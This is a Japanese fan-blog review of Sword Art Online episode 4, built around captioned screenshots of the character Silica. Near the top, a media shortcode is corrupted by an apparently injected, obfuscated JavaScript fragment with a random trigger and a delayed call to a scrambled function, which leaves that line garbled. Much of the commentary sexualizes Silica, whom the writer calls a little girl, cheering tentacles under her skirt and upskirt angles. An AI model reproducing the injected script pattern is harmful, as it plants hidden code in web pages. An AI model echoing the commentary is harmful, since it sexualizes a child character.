【アニメ感想】ソードアート・オンライン 第4話「黒の剣士」

[nicolink viandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deoid=”1343358523″]

シリカ可愛い!!


照れるシリカ。
なんだろう、この可愛い生き物。




映像になると破壊力が高すぎる。




映像スタッフ気合はいってるな。
紳士が揃っているのか




主人公のラッキースケベ回避。
視聴者はラッキーなまま。




この服装のすりっと深いね。
前の画像の下着姿ならスリットからもっと下着が見えてもいいような気もするけど、暗さのせい?
えっちな感じ。




このシーンの照れるシリカも可愛かったよね。




そして、触手の本気。
つたがどうみても、スカートの中に入っています。
いい仕事してます。




触手とくればこのアングル。
スタッフ、いいぞ、もっとやれ!!




キリトさんはちゃんとみてました。
これを狙ってミニスカートを渡した(勝手に推測)キリトさん、マジ紳士。



ここでもキリトさん、みてますよね。




シリカかっこ可愛い。

今回は端折りも少なかったですね。
ココロの声とか、本当は宿屋はシリカがキリトの部屋に行くのが変更されていたりするけど
そこまで気にはならなかったかな。
十分、シリカ可愛かったです。

あと、最後のほうで、キリトがソロだから2~3日オレンジになってもいいといっってた台詞。
原作とは変えてあるけど、アニメのテンポだと、このほうがかっこいいなという感じでした。
(キリトのキャラクター的にそんな台詞をいうだろうかというのは、どうなのかなという気もしますが
ブラフでいってもおかしくないような気もします)

次話は、2~3話かけないといけないともうけど、これまでの流れからだと、かなり端折って1話で終わらすような気がします。
もし、そうやるなら、殺らないほうがマシなくらい、中身の無い話になるような気がする。

というか、アスナがでてきても、キャラクターに感情移入できていない状況だとどうなんだろうなという気もします。

ニコニコ生放送のアンケート結果だと、1が90%を超えるほどの高評価。
触手と幼女のおかげか。
納得です!!

とにかく、シリカ可愛かったというお話でした。

コメントを残す